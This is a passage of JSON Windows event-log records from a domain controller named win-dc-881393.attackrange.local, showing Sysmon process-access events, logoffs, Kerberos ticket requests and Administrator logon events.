ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:35.765","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4801,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:35.765\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:35.765","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4802,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:35.765\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:35.765","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4803,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:35.765\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:35.765","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4804,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:35.765\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:35.765","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220531,"ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x6B9C0\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x6b9c0","LogonType":"3","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220532,"ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x6D011\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x6d011","LogonType":"3","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220533,"ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x6DADF\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x6dadf","LogonType":"3","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220534,"ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-1117747729-287425051-3091891954-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220535,"ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{5CDAB13F-10D8-4E2C-7BAE-E23AF5B85977}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-881393$\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-881393$","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{5CDAB13F-10D8-4E2C-7BAE-E23AF5B85977}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220536,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{5CDAB13F-10D8-4E2C-7BAE-E23AF5B85977}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{5CDAB13F-10D8-4E2C-7BAE-E23AF5B85977}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220537,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x793E3\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{5CDAB13F-10D8-4E2C-7BAE-E23AF5B85977}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-881393\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x793e3","LogonType":"3","LogonProcessName":"Advapi  